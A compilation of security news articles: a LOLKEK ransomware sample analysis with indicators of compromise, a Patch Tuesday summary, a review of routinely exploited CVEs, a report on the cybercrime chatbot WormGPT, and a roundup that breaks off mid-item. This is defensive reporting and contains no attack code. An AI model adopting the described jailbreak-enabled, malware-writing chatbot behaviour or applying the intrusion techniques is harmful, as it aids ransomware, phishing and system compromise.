LOLKEK Unmasked | An In-Depth Analysis of New Samples and Evolving Tactics

Awareness of the newest shifts and patterns is vital in the fast-changing world of cyber threats. This rings particularly true with ransomware, known for its quick changes and intricate tactics. This past August, our MDR team at SentinelOne stumbled upon something unusual in the wild: new instances of LOLKEK, or GlobeImposter as it’s also known, signaling fresh changes within this longstanding ransomware family.

This article takes you on an exploratory journey through the recent LOLKEK payloads, spotlighting key features, alterations in strategies, and shrewd observations in Indicators of Compromise (IoCs). We’ll also highlight a persistent OPSEC mistake that keeps giving away the ransomware operators’ game.

The knowledge and real-world examples provided here paint a complete picture of LOLKEK’s evolution and present-day situation. From its modest approach to ransom demands to its occasional connection with more elaborate financial assaults, comprehending LOLKEK provides insight into the wider landscape of ransomware.

LOLKEK Unmasked An In-Depth Analysis of New Samples and Evolving Tactics

LOLKEK | A Brief History

LOLKEK, also referred to as GlobeImposter, made its first appearance in 2016. In the fast-paced world of ransomware, where things change in the blink of an eye, this is like looking back to ancient history. This timeline even predates the ‘name-and-shame’ blogs that surfaced years later. To give you a perspective, Maze ransomware didn’t see the light of day until 2019. The GlobeImposter tag was a clever way to describe how this new ransomware imitated the methods of the then-known Globe ransomware.

LOLKEK can be considered a sort of ‘off-the-shelf’ ransomware. It’s something that’s frequently changed, tinkered with, and used, even by those with limited skills or resources. It’s often associated with what we might call a ‘small-time’ approach, especially regarding its targets and the ransom demands. In recent escapades, for example, the ransoms asked were often less than $2000 USD. Compare this to the eye-watering sums requested by heavyweights like Cl0p, LockBit, and Royal, and you see a sharp contrast.

LOLKEK’s primary targets tend to be small to medium-sized businesses (SMBs) and individual users. Despite this focus, there have been times when this ransomware played a part in more complex and calculated financial attacks. 2017 for example, the infamous TA505 (also known as G0092, GOLD TAHOE) group began employing GlobeImposter, moving away from Jaff, GandCrab, and Snatch. This allowed them to widen their net and boost the power of their operations, showcasing LOLKEK’s adaptability and role in the broader ransomware landscape.

Technical Details

We recently observed the following new LOLKEK samples in the wild:

08029396eb9aef9b413582d103b070c3f422e2b56e1326fe318bef60bdc382ed
58ac26d62653a648d69d1bcaed1b43d209e037e6d79f62a65eb5d059e8d0fc3f

These samples identify themselves as “W3CRYPTO LOCKER” while also directing victims to a new TOR-based victim portal mmcbkgua72og66w4jz3qcxkkhefax754pg6iknmtfujvkt2j65ffraad[.]onion

Both newly observed samples were compiled in May of 2023. It is worth noting that only the 58AC26D62653A648D69D1BCAED1B43D209E037E6D79F62A65EB5D059E8D0FC3F sample is fully functional. The 08029396eb9aef9b413582d103b070c3f422e2b56e1326fe318bef60bdc382ed sample does not fully execute and appears to have some structural corruption.

08029396eb9aef9b413582d103b070c3f422e2b56e1326fe318bef60bdc382ed
(possibly corrupt)
Compile time: Thu May 11 06:15:13 2023

58AC26D62653A648D69D1BCAED1B43D209E037E6D79F62A65EB5D059E8D0FC3F
Compile time: Thu May 11 06:15:13 2023

When launched, the new LOLKEK payloads will discover and subsequently encrypt any locally available drive including mounted network shares in sequence.

LOLKEK drive enumeration and discovery

The payloads also contain exclusions carried over from previous variants of the ransomware. These include the Windows, System Volume Information, and ProgramData folders.

These payloads appear to contain the functionality to discover and remove Volume Shadow Copies (VSS). However, this behavior was not observed when dynamically analyzing the sample 58ac26d62653a648d69d1bcaed1b43d209e037e6d79f62a65eb5d059e8d0fc3f. WMIC-formatted calls to remove VSS are found in the samples’ code.

VSS Removal

Encrypted files, once fully processed, will have the “.MMM” extension appended to them.

When looking deeper into the encrypted files themselves, we see another identifying marker linking them to previous generations of LOLKEK/GlobeImposter. Encrypted files contain the same “CRYPTO LOCKER” string seen in said prior generations.

CRYPTO LOCKER string in 58ac26d62653a648d69d1bcaed1b43d209e037e6d79f62a65eb5d059e8d0fc3f

LOLKEK Victim Portal and Notes

The LOLKEK ransom notes are written as ReadMe.txt to all locations containing encrypted files and data. The format and construction of the ransom notes is identical to what we have seen previously with this ransomware family.

The supplied .ONION URIs all contain a string at the end, unique to each execution of the ransomware.

Examples (defanged):
http[:]//mmcbkgua72og66w4jz3qcxkkhefax754pg6iknmtfujvkt2j65ffraad[.]onion/[?]M01YOOOOOOO http[:]//mmcbkgua72og66w4jz3qcxkkhefax754pg6iknmtfujvkt2j65ffraad[.]onion/[?]m01TGRFBRRRR http[:]//mmcbkgua72og66w4jz3qcxkkhefax754pg6iknmtfujvkt2j65ffraad[.]onion/[?]M01VXOQRTKM

LOLKEK ransom note construction
LOLKEK ransom note (May 2023)
Legacy GlobeImposter (TZW) ransom note

Current LOLKEK victims are instructed to navigate to the TOR-based victim portal where they must register an account to engage in a ‘private’ chat session with the attackers. Again, we note that the newly staged portal is functionally identical to previous victim portals staged by this operation. The look, feel, and process has not changed.

LOLKEK victim portal – TZW variation (February 2023)
LOLKEK victim portal (May 2023)

At this point, victims are able to chat with their attacker. Small files can be decrypted for free as ‘proof’ of functional decryption. Should the victim choose to comply, they will receive details on how and where to pay via a ticketing-like interface.

Upon ticket creation, the ransom details are automatically provided in the victim chat. As we see in this example, the ransom demanded is $1350 USD. Payments must be made via Bitcoin (BTC).

LOLKEK support

A LOLKEK OPSEC Misstep

The operators behind this campaign appear to have followed the same steps, process, and template as their pre-existing counterparts with regards to misconfiguration of Apache. The status page of the server is visible on the TOR-based victim page.

Apache service status

From here, we can see that the server went live on May 23, 2023; just a short time after the related samples’ compilation date on May 11, 2023. When analyzing these threats, it is always worthwhile to examine these surface-level misconfigurations. A great deal can be learned about a campaign and threat actor just through this step alone. In this case, this detail pointed to the same configuration misstep that helps us solidify the link of relation between previous TZW and GlobeImposter campaigns.

Conclusion

The journey of LOLKEK, or GlobeImposter, through the ever-shifting landscape of commodity ransomware is fascinating. While giants like LockBit and Cl0p dominate the headlines with their sophisticated schemes, it’s essential not to overlook the small-scale but persistent operations like LOLKEK. These lesser-known threats continue to evolve, find new ways to attack, and pose very real risks.

What we’re observing with LOLKEK is not a stagnant picture. Its operators are relentlessly exploring new strategies, pivoting to fresh infrastructure, and experimenting with innovative payloads. The examples we’ve highlighted may very well be the first stirrings of a new chapter for this adaptable threat. Although smaller in scale, it has shown the potential to align with more targeted, sophisticated campaigns. It’s not unthinkable that we could see LOLKEK targeting larger organizations and demanding higher ransoms in the future.

Protection against ever-adaptive threats like LOLKEK demands a robust defense. The SentinelOne Singularity XDR Platform is designed to recognize, counter, and eliminate all malicious behaviors and elements associated with LOLKEK/GlobeImposter-based attacks. If you wish to arm yourself with the technology that stays one step ahead of threats like these, contact us today or book a demo. We’re here to help ensure that the next chapter in the ransomware story doesn’t include you.

Indicators of Compromise

SHA1

ed247b58c0680b7c92632209181733e92f1b0721
768b8d81a6b0f779394e4af48755ca3ad77ed951

SHA256

08029396eb9aef9b413582d103b070c3f422e2b56e1326fe318bef60bdc382ed
58ac26d62653a648d69d1bcaed1b43d209e037e6d79f62a65eb5d059e8d0fc3f

Ransom Notes SHA256

2c66e5f96470526219f40c6adfd6990cc28d520975da1fdb6bb5497d55a54117
0b179973dc267d9c300e9b7d3c27c67a18d7c79b2cc34927cbe5a465f83c6190

Ransom Notes SHA1 

88baff4e1751bd364cdb1a4bb5fda4a37ee127c4
456b0bda3f6d9ec9a874daac050b75fc28174510

IPs/URLs/Domains

Mmcbkgua72og66w4jz3qcxkkhefax754pg6iknmtfujvkt2j65ffraad[.]onion
https[:]//yip[.]su/2QstD5
filessupport@onionmail[.]org

MITRE ATT&CK

T1005 – Data from Local System
T1202 – Indirect Command Execution
T1486 – Data Encrypted for Impact
T1070.004 – Indicator Removal: File Deletion
T1112 – Modify Registry
T1012 – Query Registry
T1083 – File and Directory Discovery
T1027.002 – Obfuscated Files or Information: Software Packing
T1082 – System Information Discovery
T1490 – Inhibit System Recovery
T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Microsoft Patch Tuesday, August 2023 Edition

Microsoft Corp. today issued software updates to plug more than 70 security holes in its Windows operating systems and related products, including multiple zero-day vulnerabilities currently being exploited in the wild.

Six of the flaws fixed today earned Microsoft’s “critical” rating, meaning malware or miscreants could use them to install software on a vulnerable Windows system without any help from users.

Last month, Microsoft acknowledged a series of zero-day vulnerabilities in a variety of Microsoft products that were discovered and exploited in-the-wild attacks. They were assigned a single placeholder designation of CVE-2023-36884.

Satnam Narang, senior staff research engineer at Tenable, said the August patch batch addresses CVE-2023-36884, which involves bypassing the Windows Search Security feature.

“Microsoft also released ADV230003, a defense-in-depth update designed to stop the attack chain associated that leads to the exploitation of this CVE,” Narang said. “Given that this has already been successfully exploited in the wild as a zero-day, organizations should prioritize patching this vulnerability and applying the defense-in-depth update as soon as possible.”

Redmond patched another flaw that is already seeing active attacks — CVE-2023-38180 — a weakness in .NET and Visual Studio that leads to a denial-of-service condition on vulnerable servers.

“Although the attacker would need to be on the same network as the target system, this vulnerability does not require the attacker to have acquired user privileges,” on the target system, wrote Nikolas Cemerikic, cyber security engineer at Immersive Labs.

Narang said the software giant also patched six vulnerabilities in Microsoft Exchange Server, including CVE-2023-21709, an elevation of privilege flaw that was assigned a CVSSv3 (threat) score of 9.8 out of a possible 10, even though Microsoft rates it as an important flaw, not critical.

“An unauthenticated attacker could exploit this vulnerability by conducting a brute-force attack against valid user accounts,” Narang said. “Despite the high rating, the belief is that brute-force attacks won’t be successful against accounts with strong passwords. However, if weak passwords are in use, this would make brute-force attempts more successful. The remaining five vulnerabilities range from a spoofing flaw and multiple remote code execution bugs, though the most severe of the bunch also require credentials for a valid account.”

Experts at security firm Automox called attention to CVE-2023-36910, a remote code execution bug in the Microsoft Message Queuing service that can be exploited remotely and without privileges to execute code on vulnerable Windows 10, 11 and Server 2008-2022 systems. Microsoft says it considers this vulnerability “less likely” to be exploited, and Automox says while the message queuing service is not enabled by default in Windows and is less common today, any device with it enabled is at critical risk.

Separately, Adobe has issued a critical security update for Acrobat and Reader that resolves at least 30 security vulnerabilities in those products. Adobe said it is not aware of any exploits in the wild targeting these flaws. The company also issued security updates for Adobe Commerce and Adobe Dimension.

If you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a fair chance other readers have experienced the same and may chime in here with useful tips.

Additional reading:

-SANS Internet Storm Center listing of each Microsoft vulnerability patched today, indexed by severity and affected component.

AskWoody.com, which keeps tabs on any developing problems related to the availability or installation of these updates.

Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities

Leveraging known bugs and unpatched exploits continue to be an unyielding strategy for threat actors. Ranging from security bypasses and credential exposure to remote code execution, software vulnerabilities remain tools of the trade for cyber attackers looking for a way into lucrative systems.

While new flaws found in Active Directory and the MOVEit file transfer application along with those used in the AlienFox toolkit or recent IceFire ransomware campaigns have wreaked havoc this year, a number of existing vulnerabilities stand out from the rest in terms of how often they are abused to this day.

In this post, we delve into CISA’s latest round-up, which lists the top 12 most routinely exploited vulnerabilities of 2022 that continue to pose significant threats to enterprise businesses.

1. Fortinet FortiOS & FortiProxy (CVE-2018-13379)

Fortinet FortiOS SSL VPNs are primarily used in border firewalls and work by fencing off sensitive internal networks from the public internet. In the case of CVE-2018-13379, a particularly severe path traversal flaw, APT actors could use specially crafted HTTP resource requests to steal legitimate credentials and connect to unpatched VPNs and download system files. Though a patch was released back in 2019, CVE-2018-13379 has come back around several times in the past three years targeting government, commercial, and technology service networks.

In 2020, a hacker posted a list of one-line exploits to steal VPN credentials from nearly 50,000 Fortinet VPN devices using this flaw. Security researchers at the time pointed out that of the 50,000 domains, over four dozen belonged to well-known financial and government organizations. Later that year, the flaw appeared again; this time exploited by government-backed actors working to compromise US election support systems. For this campaign, CVE-2018-13379 was chained together with others to gain access to exploit Internet-exposed servers and gain access. This vulnerability was seen once more in 2021 when 87,000 sets of credentials for Fortigate SSL VPN devices were leaked online, obtained through the exploitation of CVE-2018-13379.

These critical flaws remain lucrative to threat actors who bank on Fortinet’s widespread popularity and adoption as a provider of VPN solutions. The larger the user base, the more potential targets there are, which increases the appeal for attackers. As a result of their frequent abuse, the FBI and CISA have since issued a joint advisory warning users and administrators of Fortinet against advanced persistent threat (APT) actors actively exploiting existing and future critical VPN vulnerabilities. It is highly likely that these flaws will continue to be used to gain an initial foothold in vulnerable environments as a precursor for future attacks.

For more details on this vulnerability, refer to the advisory. Fortinet has also provided steps for mitigation and prevention here.

2 – 4. Microsoft Exchange Server (CVE-2021-34473, CVE-2021-31207, CVE-2021-34523)

Microsoft Exchange Server is a popular email and support system for organizations worldwide, deployed both on-premises and in the cloud. First seen in 2021, a chain of vulnerabilities identified in unpatched on-premises editions of Microsoft Exchange Server is still actively being exploited on internet-facing servers.

This chain of vulnerabilities is known collectively as “ProxyShell” and comprises CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523 to affect several versions of on-premises Microsoft Exchange Servers. ProxyShell targets unpatched Exchange servers to achieve pre-authenticated remote code execution (RCE). Out of the three, CVE-2021-34473 has the highest rated CVSS score of 9.1. While the remaining were initially classified as “exploitation less likely”, they bring significant value to attackers when used in combination with CVE-2021-34473. Together, ProxyShell allows attackers to execute arbitrary commands on vulnerable Exchange servers on port 443.

All three flaws were patched in 2021, but security researchers currently track several uncategorized threat (UNC) groups that are known to exploit ProxyShell vulnerabilities while predicting more clusters to appear as future generations of threat actors adopt working exploits. In a particular cluster of threat activity tracked as UNC2980, Mandiant researchers observed the ProxyShell vulnerabilities leveraged in a cyber espionage operation reportedly linked to Chinese-speaking actors. In this operation, UNC2980 dropped multiple tools into a US-based university’s environment after gaining access and deploying a web shell by exploiting ProxyShell. After exploitation via ProxyShell, the threat actors used publicly available tools such as Mimikatz, HTRAN, and EarthWorm to conduct post-exploitation activities.

Since its discovery, multiple intrusions leveraging ProxyShell have targeted the education, government, business services, and telecommunications industries. Microsoft’s security updates from May 2021 and June 2021 list the necessary updates that protect against ProxyShell. For more details on the vulnerability, see Microsoft’s blog post.

5. Microsoft Various Products (CVE-2022-30190)

Dubbed “Follina”, CVE-2022-30190 is a high-severity RCE vulnerability that affects multiple Microsoft Office products. Thought to be leveraged by a variety of Chinese-speaking threat actors, Follina allows the execution of arbitrary code after convincing users to open malicious Word documents or any other vector that processes URLs. Follina continues to be seen in various cyberattacks due to the large number of unpatched versions of Microsoft Office products available. It was first publicly disclosed in May of 2022:

Threat actors are known to exploit the Follina vulnerability through phishing scams, which use social engineering techniques to trick users into opening malicious Office documents. When users encounter embedded links within Office applications, these links are automatically fetched, triggering the execution of the Microsoft Support Diagnostic Tool (MSDT) protocol. MSDT (msdt.exe) is a Microsoft service primarily designed to collect system crash information for reporting to Microsoft support. However, threat actors can exploit this protocol by crafting links to force the execution of malicious PowerShell commands without requiring any further user interaction. This poses a serious security risk, as it allows attackers to remotely execute unauthorized commands on the targeted system through seemingly innocuous links.

The Follina flaw has more recently been exploited as a zero-day to support threat campaigns against organizations in critical industries. From March to May of 2022, an activity cluster tracked as UNC3658 exploited Follina to target the Philippine government. In April the same year, additional samples of Follina appeared in a campaign against South Asian telecommunication entities and business services by UNC3347. A third cluster dubbed UNC3819, CVE-2022-30190 was used to attack organizations in Russia and Belarus, suggesting a possible lure to content related to the illegal invasion of Ukraine.

CISA has urged Microsoft users and administrators to review Microsoft’s Guidance for CVE-2022-30190 to apply the necessary workarounds.

6. Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)

In late 2021, at least nine entities across the defense, healthcare, energy, technology, and education sectors were compromised through a patched critical flaw in Zoho’s ManageEngine ADSelfService Plus. The product offers a comprehensive self-service password management and single sign-on (SSO) solution tailored for Active Directory and cloud applications. This tool is designed to allow administrators to enforce two-factor authentication (2FA) for secure application logins while granting users the ability to reset their passwords autonomously.

Tracked as CVE-2021-40539, the vulnerability enabled threat actors to gain initial access to victim organizations’ systems. CVE-2021-40539 (CVSS 9.8) is an authentication bypass vulnerability affecting REST API URLs that could be used for RCE. In response to this, CISA issued a warning against the zero-day flaw and how it could be used to deploy webshells, allowing an actor to conduct post-exploitation activities, such as stealing administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory (AD) files.

Vulnerabilities in SSO solutions for AD and cloud applications are particularly nefarious. Should they be successfully exploited, attackers can essentially gain access to critical applications, sensitive data, and other areas deep within the corporate network through AD.

CVE-2021-40539 exploit analysis flowchart (Source: Zoho)

Most recently, exploitation of CVE-2021-40539 was observed in an attack against the International Committee of the Red Cross (ICRC). In their statement, Red Cross admitted to missing the critical patch that would have protected them from the exploit, highlighting the importance of maintaining a robust patch management process. As a result of the attack, the names, locations, and contact information of over 515,000 individuals part of the ICRC’s Restoring Family Links program were compromised.

Read Zoho’s advisory for more details about this vulnerability and how to update to ADSelfService Plus build 6114.

7 – 8. Atlassian Confluence Server & Data Center (CVE-2021-26084, CVE-2022-26134)

Atlassian Confluence, being a collaboration and documentation platform in use by many governments and private enterprises, continues to draw significant attention from threat actors. In CISA’s latest list of routinely exploited flaws, the Australian-based company holds two spots in the form of CVE-2021-26084 and CVE-2022-26134, which are both related to a case of Object-Graph Navigation Language (OGNL) injection.

Mass exploitation of CVE-2021-26084 first occurred in September 2021 and targeted the widely popular web-based documentation service. Confluence is designed to allow collaboration between multiple teams on shared projects. CVE-2021-26084 is a command injection vulnerability that could be exploited to execute arbitrary code on a Confluence Server or Data Center instance. Essentially having the same permissions as the user running the service, the attacker is able to execute any command, gain elevated admin privileges, and establish a foothold in the environment. CISA released an advisory guiding users and administrators to review Atlassian’s updates to prevent compromise.

Just nine months later, Atlassian rolled out a warning for another OGNL injection vulnerability targeting their Confluence Server & Data Center. Tracked as CVE-2021-26134, it enables an unauthenticated attacker to execute arbitrary code in all supported versions of Confluence Data Center and Server. This critical-level flaw quickly became one of the top exploited bugs after a proof-of-concept (PoC) was released within a week of its initial disclosure. In this instance, CVE-2021-26134 was used to achieve unauthenticated RCE on the server and then drop a Behinder web shell. The Behinder web shell gave the actors very powerful capabilities such as interaction with Meterpreter and Cobalt Strike as well as memory-only web shells.

According to Atlassian’s website, the company supports 83% of Fortune 500 companies, 10 million monthly active users, and over 235,000 users in over 190 countries. The two Atlassian-based CVEs showcase how financially-motivated threat actors will continuously leverage exploits to reach many attractive targets at once.

9. Log4Shell (CVE-2021-44228)

Log4shell, assigned as CVE-2021-44228 and also known as “the Log4j vulnerability”, is a maximum severity RCE flaw found in Apache Log4j, a popular Java-based logging library used widely in various applications. This vulnerability allows remote attackers to execute arbitrary code on affected systems, potentially leading to unauthorized access, data breaches, and even full system compromise.

The vulnerability came to light in December 2021 when it was first publicly disclosed. The issue originated from the use of untrusted data in the “log4j2” component’s look-up mechanism, enabling attackers to inject malicious code through crafted log messages. This flaw exposed a wide variety of applications, including web servers, enterprise software, and cloud-based services, that all relied on Log4j for logging.

Though Apache quickly released a patch for the level 10.0-rated RCE vulnerability, security experts confirm that exploitation will be ongoing and could lead to widespread malware deployment given its broad use across major vendors. CISA has since issued a binding operational directive (BOD), ordering federal civilian executive branch (FCEB) agencies to patch their systems against this critical vulnerability.

The rapid exploitation of Log4shell is attributed to its widespread adoption across diverse industries and platforms. The Apache Log4j library has been a staple in the Java community for many years, making it present in countless applications and systems. What’s more is that patching the vulnerability has proved challenging, as many organizations struggle to identify and update all instances of Log4j within their infrastructures promptly.

See CISA’s GitHub repository for known affected products and patch information and their dedicated page containing technical details and patching guidelines for impacted organizations.

10 – 11. VMware Workspace ONE Access & Identity Manager (CVE-2022-22954, CVE-2022-22960)

VMware is a popular virtualization software, making it a frequent target for all levels of cyber attackers including advanced persistent threat (APT) groups. Exploiting vulnerabilities in VMware could grant unauthorized access to virtual machines and critical data hosted on the platform. Since VMware virtualizes multiple systems on a single physical server, a successful attack could potentially compromise multiple VMs simultaneously. Oftentimes, attackers choose to target VMware environments in order to gain a foothold in larger networks, exploiting the trust and accessibility of the virtualized infrastructure. VMware vulnerabilities take up two spots in CISA’s list of top exploited flaws this year.

First, CVE-2022-22954 (CVSS 9.8) is a server-side template injection vulnerability that could be triggered by a malicious actor with network access to achieve RCE in VMware’s Workspace ONE Access & Identity Manager. After PoCs for the vulnerability were published in spring of last year, security researchers saw it used in active attacks infecting servers with coin miners – a common first mode of attack when new flaws are exploited. VMware has published a security advisory with more details of this vulnerability here.

Second, CVE-2022-22960 (CVSS ) is a privilege escalation vulnerability. According to CISA’s advisory on this vulnerability, it enables a malicious actor with local access to escalate privileges to root due to improper permissions in support scripts. If chained together with CVE-2022-22954, an actor could execute an arbitrary shell command as a VMware user and then wipe logs, escalate permissions, and move laterally to other systems with root access.

Since VMware products are used commonly across Federal Civilian Executive Branch (FCEB) agencies among other critical industries, CISA ordered an emergency directive for government agencies to complete a series of mitigation measures. These measures can be found here.

12. F5 Networks BIG-IP (CVE-2022-1388)

A few days after F5 published a patch for a critical RCE vulnerability tied to their BIG-IP suite of products last September, security researchers were able to create an exploit for the flaw. Classified as a missing authentication vulnerability, CVE-2022-1388 (CVSS 9.8) relates to an iControl REST authentication bypass that could lead to attackers gaining access and taking control of a compromised BIG-IP system. The attacker could perform a number of malicious actions such as dropping webshells for future attacks, deploying cryptocurrency miners, and exfiltrating sensitive data.

Remote code execution flaws are trivial to exploit, making them popular for targeting by opportunistic threat actors. Whenever vulnerabilities are found in internet-facing services, threat actors are sure to make quick work in leveraging them. Exploits like CVE-2022-1388 provide immediate, initial access to a targeted network and often enable attackers to follow through with lateral movement and privilege escalation; critical tactics in the cyberattack kill chain.

F5’s security advisory detailing CVE-2022-1388 indicators of compromise (IoCs) and steps for mitigation can be found here. CISA also released an advisory in response to the flaw in response to several PoCs that were published shortly after initial disclosure.

Conclusion

Enterprise security teams must acknowledge that old vulnerabilities persist and continue to pose a significant threat. While the latest CVEs often receive the spotlight, CISA’s annual list of routinely exploited vulnerabilities serves as a stark reminder that existing flaws are still capable of inflicting serious damage on vulnerable systems.

In addition to the comprehensive list, CISA offers guidance to vendors and tech organizations for identifying and mitigating potential risks. The recommendations include adopting secure-by-design practices and prioritizing patching known exploited vulnerabilities, thus minimizing the risk of compromise. Vendors are also encouraged to establish coordinated vulnerability disclosure programs, enabling root cause analysis for discovered flaws.

SentinelOne is ready to help security leaders defend their organizations against every level of cyberattack. To see how we can help you build a robust security posture, contact us today or book a demo.

Meet the Brains Behind the Malware-Friendly AI Chat Service ‘WormGPT’

WormGPT, a private new chatbot service advertised as a way to use Artificial Intelligence (AI) to write malicious software without all the pesky prohibitions on such activity enforced by the likes of ChatGPT and Google Bard, has started adding restrictions of its own on how the service can be used. Faced with customers trying to use WormGPT to create ransomware and phishing scams, the 23-year-old Portuguese programmer who created the project now says his service is slowly morphing into “a more controlled environment.”

Image: SlashNext.com.

The large language models (LLMs) made by ChatGPT parent OpenAI or Google or Microsoft all have various safety measures designed to prevent people from abusing them for nefarious purposes — such as creating malware or hate speech. In contrast, WormGPT has promoted itself as a new, uncensored LLM that was created specifically for cybercrime activities.

WormGPT was initially sold exclusively on HackForums, a sprawling, English-language community that has long featured a bustling marketplace for cybercrime tools and services. WormGPT licenses are sold for prices ranging from 500 to 5,000 Euro.

“Introducing my newest creation, ‘WormGPT,’ wrote “Last,” the handle chosen by the HackForums user who is selling the service. “This project aims to provide an alternative to ChatGPT, one that lets you do all sorts of illegal stuff and easily sell it online in the future. Everything blackhat related that you can think of can be done with WormGPT, allowing anyone access to malicious activity without ever leaving the comfort of their home.”

WormGPT’s core developer and frontman “Last” promoting the service on HackForums. Image: SlashNext.

In July, an AI-based security firm called SlashNext analyzed WormGPT and asked it to create a “business email compromise” (BEC) phishing lure that could be used to trick employees into paying a fake invoice.

“The results were unsettling,” SlashNext’s Daniel Kelley wrote. “WormGPT produced an email that was not only remarkably persuasive but also strategically cunning, showcasing its potential for sophisticated phishing and BEC attacks.”

SlashNext asked WormGPT to compose this BEC phishing email. Image: SlashNext.

A review of Last’s posts on HackForums over the years shows this individual has extensive experience creating and using malicious software. In August 2022, Last posted a sales thread for “Arctic Stealer,” a data stealing trojan and keystroke logger that he sold there for many months.

“I’m very experienced with malwares,” Last wrote in a message to another HackForums user last year.

Last has also sold a modified version of the information stealer DCRat, as well as an obfuscation service marketed to malicious coders who sell their creations and wish to insulate them from being modified or copied by customers.

Shortly after joining the forum in early 2021, Last told several different Hackforums users his name was Rafael and that he was from Portugal. HackForums has a feature that allows anyone willing to take the time to dig through a user’s postings to learn when and if that user was previously tied to another account.

That account tracing feature reveals that while Last has used many pseudonyms over the years, he originally used the nickname “ruiunashackers.” The first search result in Google for that unique nickname brings up a TikTok account with the same moniker, and that TikTok account says it is associated with an Instagram account for a Rafael Morais from Porto, a coastal city in northwest Portugal.

AN OPEN BOOK

Reached via Instagram and Telegram, Morais said he was happy to chat about WormGPT.

“You can ask me anything,” Morais said. “I’m an open book.”

Morais said he recently graduated from a polytechnic institute in Portugal, where he earned a degree in information technology. He said only about 30 to 35 percent of the work on WormGPT was his, and that other coders are contributing to the project. So far, he says, roughly 200 customers have paid to use the service.

“I don’t do this for money,” Morais explained. “It was basically a project I thought [was] interesting at the beginning and now I’m maintaining it just to help [the] community. We have updated a lot since the release, our model is now 5 or 6 times better in terms of learning and answer accuracy.”

WormGPT isn’t the only rogue ChatGPT clone advertised as friendly to malware writers and cybercriminals. According to SlashNext, one unsettling trend on the cybercrime forums is evident in discussion threads offering “jailbreaks” for interfaces like ChatGPT.

“These ‘jailbreaks’ are specialised prompts that are becoming increasingly common,” Kelley wrote. “They refer to carefully crafted inputs designed to manipulate interfaces like ChatGPT into generating output that might involve disclosing sensitive information, producing inappropriate content, or even executing harmful code. The proliferation of such practices underscores the rising challenges in maintaining AI security in the face of determined cybercriminals.”

Morais said they have been using the GPT-J 6B model since the service was launched, although he declined to discuss the source of the LLMs that power WormGPT. But he said the data set that informs WormGPT is enormous.

“Anyone that tests wormgpt can see that it has no difference from any other uncensored AI or even chatgpt with jailbreaks,” Morais explained. “The game changer is that our dataset [library] is big.”

Morais said he began working on computers at age 13, and soon started exploring security vulnerabilities and the possibility of making a living by finding and reporting them to software vendors.

“My story began in 2013 with some greyhat activies, never anything blackhat tho, mostly bugbounty,” he said. “In 2015, my love for coding started, learning c# and more .net programming languages. In 2017 I’ve started using many hacking forums because I have had some problems home (in terms of money) so I had to help my parents with money… started selling a few products (not blackhat yet) and in 2019 I started turning blackhat. Until a few months ago I was still selling blackhat products but now with wormgpt I see a bright future and have decided to start my transition into whitehat again.”

WormGPT sells licenses via a dedicated channel on Telegram, and the channel recently lamented that media coverage of WormGPT so far has painted the service in an unfairly negative light.

“We are uncensored, not blackhat!” the WormGPT channel announced at the end of July. “From the beginning, the media has portrayed us as a malicious LLM (Language Model), when all we did was use the name ‘blackhatgpt’ for our Telegram channel as a meme. We encourage researchers to test our tool and provide feedback to determine if it is as bad as the media is portraying it to the world.”

It turns out, when you advertise an online service for doing bad things, people tend to show up with the intention of doing bad things with it. WormGPT’s front man Last seems to have acknowledged this at the service’s initial launch, which included the disclaimer, “We are not responsible if you use this tool for doing bad stuff.”

But lately, Morais said, WormGPT has been forced to add certain guardrails of its own.

“We have prohibited some subjects on WormGPT itself,” Morais said. “Anything related to murders, drug traffic, kidnapping, child porn, ransomwares, financial crime. We are working on blocking BEC too, at the moment it is still possible but most of the times it will be incomplete because we already added some limitations. Our plan is to have WormGPT marked as an uncensored AI, not blackhat. In the last weeks we have been blocking some subjects from being discussed on WormGPT.”

Still, Last has continued to state on HackForums — and more recently on the far more serious cybercrime forum Exploit — that WormGPT will quite happily create malware capable of infecting a computer and going “fully undetectable” (FUD) by virtually all of the major antivirus makers (AVs).

“You can easily buy WormGPT and ask it for a Rust malware script and it will 99% sure be FUD against most AVs,” Last told a forum denizen in late July.

Asked to list some of the legitimate or what he called “white hat” uses for WormGPT, Morais said his service offers reliable code, unlimited characters, and accurate, quick answers.

“We used WormGPT to fix some issues on our website related to possible sql problems and exploits,” he explained. “You can use WormGPT to create firewalls, manage iptables, analyze network, code blockers, math, anything.”

Morais said he wants WormGPT to become a positive influence on the security community, not a destructive one, and that he’s actively trying to steer the project in that direction. The original HackForums thread pimping WormGPT as a malware writer’s best friend has since been deleted, and the service is now advertised as “WormGPT – Best GPT Alternative Without Limits — Privacy Focused.”

“We have a few researchers using our wormgpt for whitehat stuff, that’s our main focus now, turning wormgpt into a good thing to [the] community,” he said.

It’s unclear yet whether Last’s customers share that view.

The Good, the Bad and the Ugly in Cybersecurity – Week 31

The Good | High-Severity Flaws Patched in Firefox and Chrome Updates

Browsers are our windows to the internet and due to both their ubiquity and the amount of information they collect, they are often prime targets for threat actors, so there’s good news for Firefox and Chrome users this week as new security patches have been rolled out for both.

On Tuesday, Mozilla released new versions of Firefox 116, Firefox ESR 115.1, and Firefox ESR 102.14, which all include patches for several high-severity vulnerabilities, most prominently CVE-2023-4045, CVE-2023-4046, and CVE-2023-4047. The new iterations prohibit HTML and JavaScript code displayed on one site from accessing content on another site, correct a potentially exploitable crash caused by wrong values during WASM compilation, and resolve a clickjacking issue where users are tricked into giving up risky permissions for microphone, location, and notification services.

On the Google side, the tech firm handed out over $60,000 in bug bounties for three high-severity type confusion vulnerabilities in Chrome’s V8 engine. The latest update, Chrome 115, addresses six other severe flaws relating to issues such as a heap buffer overflow problem which often results in unpredictable behavior or generates incorrect results, crashes, or memory access errors, an insufficient data validation bug, and an inappropriate implementation issue. Users are encouraged to update to versions 115.0.5790.170 for Mac and Linux and to versions 115.0.5790.170/.171 for Windows.

The Bad | More Vulnerabilities Found in Ivanti’s Mobile Device Management Product

Following a maximum severity bypass vulnerability reported last week by Ivanti, the Utah-based IT firm has since issued warnings for two more vulnerabilities also found in its Endpoint Manager Mobile (EPMM) software.

